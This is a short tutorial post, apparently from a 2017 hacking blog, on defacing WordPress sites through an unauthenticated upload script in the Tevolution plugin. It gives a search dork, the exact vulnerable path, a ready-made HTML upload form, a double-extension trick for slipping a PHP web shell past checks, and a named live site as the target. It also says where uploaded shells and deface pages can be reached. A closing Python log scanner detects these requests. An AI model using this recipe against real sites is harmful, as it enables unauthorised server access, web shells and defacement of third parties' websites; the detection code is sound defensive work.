Sunday 4 June 2017

Deface Method: Tevolution Plugin Vulnerability







Materials:

1. Dork: inurl:"/plugins/Tevolution/" (expand on it further)

2. Exploit: /wp-content/plugins/Tevolution/tmplconnector/monetize/templatic-custom_fields/single-upload.php

3. CSRF (save with the .html extension):
<form action = "http://site.target/wp-content/plugins/Tevolution/tmplconnector/monetize/templatic-custom_fields/single-upload.php" 
method = "post" enctype = "multipart / form-data"> <label for = "file"> Filename: </ label> <input type = "file" name = "Filedata"> reviews <input type = "submit" name = "submit" value = "3xploi7ed!"> </ form >

4. Shell: in the format .php.xxxjpg => Download
    example: Shell.php.xxxjpg

5. Deface script: download

Step by Step:

1. Dork first

2. Pick one of the sites
    Live Target: http://www.hebergement.rayssaguel.com/

3. Enter the exploit path
    example: http://www.hebergement.rayssaguel.com/wp-content/plugins/Tevolution/tmplconnector/monetize/templatic-custom_fields/single-upload.php

Vulnerable?! "Blank" (the page is all white)

4. Create the CSRF form from above => enter the target => save with the .html extension

5. Open the CSRF form => upload the shell / deface script

If it fails, the text [Error] appears.

Shell access?!
www.site.com/wp-content/uploads/[year]/[month]/nameshell

Deface script access?!

www.site.com/wp-content/uploads/[year]/[month]/namascript.html
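
Seen from the site owner's side, the steps above leave two traces in the web server access log: requests to the plugin's single-upload.php, and a later request for a file under wp-content/uploads/ whose name has .php in front of a final extension. The following detection sketch is an added example, not part of the original post; it assumes the Apache/nginx "combined" log format, and the sample log lines are constructed.

```python
import re
from urllib.parse import unquote, urlsplit

# Upload endpoint named in this post, lower-cased for case-insensitive matching.
UPLOAD_ENDPOINT = ("/wp-content/plugins/tevolution/tmplconnector/monetize/"
                   "templatic-custom_fields/single-upload.php")
UPLOADS_DIR = "/wp-content/uploads/"
# Script extension followed by one more extension, e.g. Shell.php.xxxjpg.
DOUBLE_EXT = re.compile(r"\.(php\d?|phtml|phar)\.[a-z0-9]+$", re.I)
# Assumption: Apache/nginx "combined" access log format.
LOG_LINE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) ')


def classify(line):
    """Return (ip, finding, path) for a suspicious request, else None."""
    m = LOG_LINE.match(line)
    if not m:
        return None
    path = unquote(urlsplit(m["target"]).path)
    lowered = path.lower()
    if lowered.endswith(UPLOAD_ENDPOINT):
        kind = "upload-endpoint-post" if m["method"] == "POST" else "upload-endpoint-probe"
        return (m["ip"], kind, path)
    if UPLOADS_DIR in lowered and DOUBLE_EXT.search(lowered):
        # Status 200 means the file exists on disk and was served.
        kind = "double-ext-served" if m["status"] == "200" else "double-ext-requested"
        return (m["ip"], kind, path)
    return None


def scan(lines):
    """Classify every line and keep only the findings, in log order."""
    return [hit for hit in map(classify, lines) if hit]


# Constructed sample log (documentation IP ranges, made-up timestamps).
_EP = "/wp-content/plugins/Tevolution/tmplconnector/monetize/templatic-custom_fields/single-upload.php"
SAMPLE_LOG = [
    f'203.0.113.7 - - [04/Jun/2017:10:01:02 +0000] "GET {_EP} HTTP/1.1" 200 0 "-" "-"',
    f'203.0.113.7 - - [04/Jun/2017:10:02:40 +0000] "POST {_EP} HTTP/1.1" 200 31 "-" "-"',
    '203.0.113.7 - - [04/Jun/2017:10:03:05 +0000] "GET /wp-content/uploads/2017/06/Shell.php.xxxjpg HTTP/1.1" 200 512 "-" "-"',
    '198.51.100.20 - - [04/Jun/2017:10:03:09 +0000] "GET /wp-content/uploads/2017/06/photo.jpg HTTP/1.1" 200 90211 "-" "-"',
    '198.51.100.20 - - [04/Jun/2017:10:04:00 +0000] "POST /wp-login.php HTTP/1.1" 302 0 "-" "-"',
]

if __name__ == "__main__":
    for ip, kind, path in scan(SAMPLE_LOG):
        print(f"{ip}  {kind:<22} {path}")
```

Denying script execution under wp-content/uploads in the web server configuration addresses the second finding regardless of how a file arrived there.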